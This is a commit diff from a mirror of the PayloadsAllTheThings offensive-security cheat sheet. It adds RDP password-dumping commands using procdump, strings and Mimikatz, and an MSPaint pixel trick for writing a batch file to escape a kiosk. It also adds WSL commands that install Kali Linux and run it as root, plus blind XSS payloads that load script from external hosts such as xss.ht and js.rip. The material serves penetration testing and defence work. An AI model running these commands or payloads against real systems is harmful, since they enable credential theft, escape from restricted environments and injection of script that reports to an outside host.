mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
WSL + RDP Passwords + MSPaint Escape
This commit is contained in:
parent
ccae5a6e09
commit
14cc88371d
5 changed files with 72 additions and 15 deletions
|
@ -4186,3 +4186,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
|
||||
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
|
||||
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
|
||||
* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
|
||||
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
|
|
@ -26,15 +26,17 @@
|
|||
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
|
||||
* **Task Manager**: `File` > `New Task (Run...)` > `cmd`
|
||||
* **MSPAINT.exe**
|
||||
* Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
|
||||
* Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels
|
||||
* Zoom in to make the following tasks easier
|
||||
* Using the colour picker, set pixels values to (from left to right):
|
||||
* 1st: R: 10, G: 0, B: 0
|
||||
* 2nd: R: 13, G: 10, B: 13
|
||||
* 3rd: R: 100, G: 109, B: 99
|
||||
* 4th: R: 120, G: 101, B: 46
|
||||
* 5th: R: 0, G: 0, B: 101
|
||||
* 6th: R: 0, G: 0, B: 0
|
||||
```ps1
|
||||
1st: R: 10, G: 0, B: 0
|
||||
2nd: R: 13, G: 10, B: 13
|
||||
3rd: R: 100, G: 109, B: 99
|
||||
4th: R: 120, G: 101, B: 46
|
||||
5th: R: 0, G: 0, B: 101
|
||||
6th: R: 0, G: 0, B: 0
|
||||
```
|
||||
* Save it as 24-bit Bitmap (*.bmp;*.dib)
|
||||
* Change its extension from bmp to bat and run
|
||||
|
||||
|
@ -147,3 +149,4 @@ firefox irc://127.0.0.1 -P "Test"
|
|||
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
|
||||
* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
|
||||
* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
|
||||
* [HOW TO LAUNCH COMMAND PROMPT AND POWERSHELL FROM MS PAINT - 2022-05-14 - Rickard](https://tzusec.com/how-to-launch-command-prompt-and-powershell-from-ms-paint/)
|
|
@ -9,7 +9,8 @@
|
|||
* [Pass The Hash](#pass-the-hash)
|
||||
* [Golden ticket](#golden-ticket)
|
||||
* [Skeleton key](#skeleton-key)
|
||||
* [RDP session takeover](#rdp-session-takeover)
|
||||
* [RDP Session Takeover](#rdp-session-takeover)
|
||||
* [RDP Passwords](#rdp-passwords)
|
||||
* [Credential Manager & DPAPI](#credential-manager--dpapi)
|
||||
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
||||
* [Task Scheduled credentials](#task-scheduled-credentials)
|
||||
|
@ -168,7 +169,7 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
|
|||
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
||||
```
|
||||
|
||||
## RDP session takeover
|
||||
## RDP Session Takeover
|
||||
|
||||
Use `ts::multirdp` to patch the RDP service to allow more than two users.
|
||||
|
||||
|
@ -195,6 +196,34 @@ create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
|
|||
net start sesshijack
|
||||
```
|
||||
|
||||
## RDP Passwords
|
||||
|
||||
Verify if the service is running:
|
||||
|
||||
```ps1
|
||||
sc queryex termservice
|
||||
tasklist /M:rdpcorets.dll
|
||||
netstat -nob | Select-String TermService -Context 1
|
||||
```
|
||||
|
||||
* Extract passwords manually
|
||||
```ps1
|
||||
procdump64.exe -ma 988 -accepteula C:\svchost.dmp
|
||||
strings -el svchost* | grep Password123 -C3
|
||||
```
|
||||
* Extract passwords using Mimikatz
|
||||
```ps1
|
||||
privilege::debug
|
||||
ts::logonpasswords
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Credential Manager & DPAPI
|
||||
|
||||
|
@ -286,3 +315,4 @@ More information can be grabbed from the Memory with :
|
|||
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
|
||||
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
|
||||
- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
|
||||
- [Dumping RDP Credentials - MAY 24, 2021](https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/)
|
|
@ -33,6 +33,7 @@
|
|||
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
|
||||
* [Skeleton Key](#skeleton-key)
|
||||
* [Virtual Machines](#virtual-machines)
|
||||
* [Windows Subsystem for Linux](#windows-subsystem-for-linux)
|
||||
* [Domain](#domain)
|
||||
* [Golden Certificate](#golden-certificate)
|
||||
* [Golden Ticket](#golden-ticket)
|
||||
|
@ -539,6 +540,22 @@ sudo mkdir /mnt/c
|
|||
sudo mount -t vboxsf shadow_c /mnt/c
|
||||
```
|
||||
|
||||
### Windows Subsystem for Linux
|
||||
|
||||
```ps1
|
||||
# List and install online packages
|
||||
wsl --list --online
|
||||
wsl --install -d kali-linux
|
||||
|
||||
# Use a local package
|
||||
wsl --set-default-version 2
|
||||
curl.exe --insecure -L -o debian.appx https://aka.ms/wsl-debian-gnulinux
|
||||
Add-AppxPackage .\debian.appx
|
||||
|
||||
# Run the machine as root
|
||||
wsl kali-linux --user root
|
||||
```
|
||||
|
||||
|
||||
## Domain
|
||||
|
||||
|
|
|
@ -510,13 +510,18 @@ document.getElementById('btn').onclick = function(e){
|
|||
|
||||
### XSS Hunter
|
||||
|
||||
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). You can set up an alternative version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
|
||||
|
||||
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
|
||||
|
||||
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
|
||||
|
||||
You can set up an alternative version
|
||||
* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
|
||||
* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
|
||||
|
||||
```xml
|
||||
"><script src=//<your.subdomain>.xss.ht></script>
|
||||
<script>$.getScript("//<your.subdomain>.xss.ht")</script>
|
||||
"><script src="https://js.rip/<custom.name>"></script>
|
||||
"><script src=//<custom.subdomain>.xss.ht></script>
|
||||
<script>$.getScript("//<custom.subdomain>.xss.ht")</script>
|
||||
```
|
||||
|
||||
### Other Blind XSS tools
|
||||
|
|
Loading…
Reference in a new issue